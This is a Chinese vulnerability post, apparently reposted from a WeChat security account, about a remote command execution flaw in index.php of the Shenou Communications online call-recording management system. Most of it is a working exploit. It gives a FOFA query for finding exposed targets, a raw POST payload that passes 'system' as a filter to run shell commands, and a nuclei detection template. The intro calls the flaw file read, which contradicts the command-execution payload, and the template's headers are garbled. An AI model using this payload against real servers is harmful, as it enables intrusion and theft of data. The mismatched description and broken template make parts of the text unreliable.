申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法
title="在线录音管理系统"
步骤二:发送以下数据包进行命令执行后可在响应正文中获取命令的执行结果!
POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 62
s=id&_method=__construct&method=POST&filter[]=system
id: LYXT-index-RCE
info:
name: 申瓯通信设备有限公司在线录音管理系统-RCE-index.php
author: WLF
severity: high
metadata:
FOFA: title="在线录音管理系统"
Hunter:
variables:
filename: "{{to_lower(rand_base(5))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
raw:
|
POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 :
application/x-www-form-urlencoded :
no-cache :
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
62 :
s=echo Hello World!&_method=__construct&method=POST&filter[]=system
matchers:
type: dsl
dsl:
contains_all(body,"Hello World!")
原文始发于微信公众号(揽月安全团队):申瓯通信设备有限公司在线录音管理系统 -RCE-index.php
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论